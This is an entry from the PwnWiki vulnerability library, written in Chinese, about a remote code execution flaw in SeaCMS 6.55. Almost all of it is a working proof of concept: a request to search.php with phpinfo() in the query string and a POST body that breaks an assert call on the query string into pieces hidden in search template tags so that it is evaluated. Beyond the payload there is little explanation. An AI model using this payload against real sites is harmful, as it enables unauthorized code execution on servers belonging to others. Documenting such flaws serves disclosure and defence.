Loading
0

Seacms6.55 远程代码执行漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

POC

http://192.168.0.6/seacms655/search.php?phpinfo(); 
post:
searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=QUERY_STRING));/*

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库